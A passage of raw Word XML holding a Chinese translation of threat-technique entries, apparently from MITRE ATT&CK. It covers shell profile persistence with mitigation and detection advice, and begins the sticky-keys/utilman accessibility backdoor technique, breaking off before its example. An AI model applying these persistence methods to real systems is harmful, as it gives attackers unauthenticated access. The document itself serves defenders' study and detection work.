        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这意味着当用户（通过用户名和密码）登录到控制台（本地登录或通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等远程登录）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>时，会在初始命令提示返回给用户之前执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后，每次打开一个新</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，都会执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这允许用户更精细地控制何时执行某些命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBF071F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mac</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>erminal.app</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有点不同：它在每次打开新的终端窗口时默认运行一个登录</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此每次都调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bash_profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A810A19" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些文件是由本地用户编写的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于配置他们自己的环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是，每次用户登录或打开新</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，攻击者可能会在这些文件中插入代码以获得持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436D591E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2830"/>
        <w:gridCol w:w="6906"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00771025" w14:paraId="2B8AD7B5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5500AD70" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="160A7DDA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00771025" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00771025">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="00708D5B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0882077C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId36" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>文件和目录权限</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6906" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F65D385" w14:textId="604D69A2" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使这些文件不可更改且仅由某些管理员更改，限制攻击者轻松创建用户级</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的能力。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78EB8F3B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE2CCF5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADDC86B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然用户可以自定义他们的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>~/.bashrc</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cstheme="minorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>~/.bash_profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，但这些文件中通常只显示某些类型的命令。在登录过程中加载用户配置文件时，监控异常命令，例如：执行未知程序，打开网络套接字或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跨网断访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E7C9F" w14:textId="7B31431D" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00BE6ED6" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>辅助功能</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="7E6F9454" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68DFD21A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1015</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D8C1053" w14:textId="14404E05" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="315B3B09" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F49DEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A5AE516" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>有效权限：系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C1356FA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册表</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CFCBACC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00671A0D">
                <w:t>CAPEC-558</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00671A0D">
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5696CEE4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Paul Speulstra</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>AECOM Global Security Operations Center</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="728BF62A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="199A4A16" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="4F18F34D" w14:textId="7E297914" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含用户登录之前（例如，当用户在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录屏幕上时）可用组合键启动的</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者可能会修改这些程序的启动方式，以便在不登录系统的情况下获得命令提示符或后门。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3AAB7D" w14:textId="446E08C0" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个常见的</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\sethc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（按下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shift</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键五次后启动）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\utilman.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（按下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows+U</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组合键时启动）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sethc.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序通常被称为“粘滞键”，已被攻击者用来通过远程桌面登录屏幕进行不经认证的访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D19E12" w14:textId="160B9350" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>由于代码完整性增强，攻击者可能会以不同的方式利用这些功能，具体取决于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的版本。在较新版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，替换的二进制文件需要为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统进行数字签名，二进制文件必须位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%systemdir%\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并且必须受</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WFP/WRP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Windows File or Resource Protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）的保护。攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>很可能使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调试器方法来规避</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>这些问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为它不需要替换相应的</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二进制文件。以下是两种方法的示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9F333" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>示例</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和更高版本以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Server 2003/R2</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和更高版本上的简单二进制替换方法。可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>替换</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序（比如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\utilman.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）为“</w:t>
      </w:r>
